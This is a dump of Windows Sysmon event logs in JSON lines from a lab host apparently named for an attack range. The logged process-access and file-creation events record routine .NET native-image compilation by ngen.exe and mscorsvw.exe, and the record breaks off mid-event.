{"EventTime":"2020-08-01 05:59:04","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7378,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:04.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-049A-5F25-0000-0010336A0F00}\r\nTargetProcessId: 3544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:04.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-049A-5F25-0000-0010336A0F00}","TargetProcessId":"3544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7379,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:05.137\r\nProcessGuid: {A837DB8D-04A8-5F25-0000-00103DF20F00}\r\nProcessId: 3544\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\dd8-0\\System.ComponentModel.Composition.dll\r\nCreationUtcTime: 2020-08-01 05:59:05.137","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:05.137","ProcessGuid":"{A837DB8D-04A8-5F25-0000-00103DF20F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\dd8-0\\System.ComponentModel.Composition.dll","CreationUtcTime":"2020-08-01 05:59:05.137","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7380,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.184\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010D8030F00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.184","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010D8030F00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7381,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.184\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010D8030F00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.184","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010D8030F00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7382,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.199\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-0010B3FA0F00}\r\nTargetProcessId: 2292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.199","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-0010B3FA0F00}","TargetProcessId":"2292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7383,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.262\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-001026FE0F00}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.262","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-001026FE0F00}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7384,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.262\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-001026FE0F00}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.262","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-001026FE0F00}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7385,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.262\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-001026FE0F00}\r\nTargetProcessId: 2772\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:05.262","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04A9-5F25-0000-001026FE0F00}","TargetProcessId":"2772","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7386,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:05.371\r\nProcessGuid: {A837DB8D-04A9-5F25-0000-001026FE0F00}\r\nProcessId: 2772\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ad4-0\\System.ComponentModel.Composition.Registration.dll\r\nCreationUtcTime: 2020-08-01 05:59:05.371","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:05.371","ProcessGuid":"{A837DB8D-04A9-5F25-0000-001026FE0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ad4-0\\System.ComponentModel.Composition.Registration.dll","CreationUtcTime":"2020-08-01 05:59:05.371","EventReceivedTime":"2020-08-01 05:59:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:05","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7387,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:05.418\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04A9-5F25-0000-0010D0011000}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 